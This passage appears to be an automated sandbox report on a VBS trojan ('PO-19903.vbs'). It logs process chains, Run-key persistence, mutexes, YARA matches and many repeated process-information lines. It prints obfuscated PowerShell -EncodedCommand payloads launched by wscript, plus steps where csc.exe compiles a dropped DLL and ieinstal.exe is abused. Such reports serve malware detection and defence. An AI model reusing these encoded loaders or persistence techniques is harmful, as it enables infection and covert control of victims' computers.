AG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OVER.datJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winVBS@15/12@15/5
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\oMDTItPV
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:120:WilError_03
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EB2FE push eax; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EB4F6 pushad ; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08639C98 pushfd ; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08639DF0 pushfd ; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08670028 push esp; retf
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086731AC pushad ; iretd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874FB90 push 00000008h; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874A200 push 00000008h; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F58D0 push eax; retf
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F43E8 pushad ; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F44F0 pushfd ; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F692E2 push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dllJump to dropped file
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DenialschJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DenialschJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
